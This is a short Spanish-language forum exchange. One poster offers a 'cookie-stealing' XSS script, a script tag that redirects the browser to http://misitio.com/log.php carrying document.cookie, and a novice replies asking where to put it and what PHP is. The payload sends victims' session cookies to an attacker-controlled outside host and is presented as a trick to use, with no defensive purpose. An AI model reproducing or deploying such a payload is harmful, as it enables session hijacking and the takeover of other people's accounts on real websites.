Recuerdas la vulnerabilidad XSS??? de ese ataque muy conocido podemos hacer un script robador de cookie bueno veamos

el script lo cual es el siguiente codigo

Código:

<script>self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);</script>

disculpa pero en donde escribes el script?   ( soy novato, pero me intereso este truco)   y que es PHP?